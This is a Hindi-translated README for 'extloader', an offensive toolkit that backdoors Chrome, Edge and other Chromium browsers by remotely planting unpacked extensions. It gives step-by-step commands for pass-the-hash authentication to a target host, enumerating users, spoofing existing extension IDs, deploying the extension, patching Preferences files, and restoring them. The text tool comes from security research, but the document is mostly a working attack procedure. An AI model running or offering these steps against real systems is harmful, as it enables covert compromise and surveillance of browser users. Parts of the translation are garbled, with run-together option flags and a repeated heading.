
एक क्रोमियम एक्सटेंशन शोषण टूलकिट
छोटा टूलकिट जो अनपैक्ड Chromium एक्सटेंशन के प्रबंधन और परिनियोजन के लिए है।
अधिक जानकारी निम्न ब्लॉगपोस्ट में: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways
pipx install .
extloader --help
अलग-अलग स्थापना के लिए
pipxका उपयोग करें, जो Python 3.10+ को लक्षित करता है।
uv venv
source .venv/bin/activate
uv pip install -e .
-p/--password-H/--hash (LM:NT प्रारूप या केवल NT)-d/--domain (डिफ़ॉल्ट रूप से WORKGROUP)-t, --target: लक्ष्य IP/होस्टनाम-u, --username: उपयोगकर्ता नाम-i, --index: check कमांड से उपयोगकर्ता इंडेक्स--debug: डीबग लॉगिंग सक्षम करेंएक्सटेंशन परिनियोजित करने का चरण-दर-चरण उदाहरण:
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local
┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index ┃ Browser ┃ User (SID) ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ Chrome │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122) │
│ 2 │ Microsoft Edge │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122) │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘
जब किसी अन्य मशीन पर exploit चलाएं, तो संदर्भ (
available_targets.json) को ताज़ा करने के लिए पहले हमेशाcheckकमांड चलाएं।
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension
किसी मौजूदा एक्सटेंशन ID को स्पूफ़ करने के लिए, उपरोक्त कमांड को छोड़ें और मैनिफेस्ट
keyको उस एक्सटेंशन की base64 सार्वजनिक कुंजी पर सेट करें जिसकी नकल की जा रही है। उस key को पुनः उपयोग करने से CRX ID अपरिवर्तित रहती है।
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
4.(वैकल्पिक) मैन्युअल परिनियोजन के लिए पैकेज बनाएं:
# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"
# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions
--prefs-fileआपके द्वारा बैकअप की गई ब्राउज़र प्रोफ़ाइल प्राथमिकताओं की अपेक्षा करता है (Chrome/Edge उन्हेंSecure Preferencesके रूप में संग्रहीत करते हैं, अन्य Chromium ब्राउज़रPreferencesका उपयोग करते हैं)। लोडर इसे कॉपी करता है, पैच करता है, और संशोधित तथा बिना संशोधित दोनों संस्करणों को पैकेज में शामिल करता है।
├── extension/
│ └── chrome-mv3/
├── preferences/
│ ├── brave/
│ ├── chrome/
│ ├── chromium/
[...]
└── info.json
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
package वर्कफ़्लो अनुकूलित करेंpackage वर्कफ़्लो अनुकूलित करें